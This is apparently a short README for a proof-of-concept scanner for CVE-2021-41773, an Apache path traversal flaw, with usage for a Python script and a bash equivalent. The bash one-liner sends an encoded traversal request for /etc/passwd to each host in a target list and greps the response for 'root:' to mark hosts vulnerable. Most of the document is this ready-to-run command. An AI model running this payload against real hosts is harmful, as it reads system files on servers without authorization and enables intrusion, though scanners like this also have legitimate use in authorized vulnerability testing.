Quick and dirty proof of concept for checking if hosts vulnerable to CVE-2021-41773
python3 full.py hosts.txt
Where hosts.txt contains your targets:
domain.com
blah.com
192.168.1.1
It'll print out if the host is vulnerable or not vulnerable.
Python version of bash:
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
Enjoy!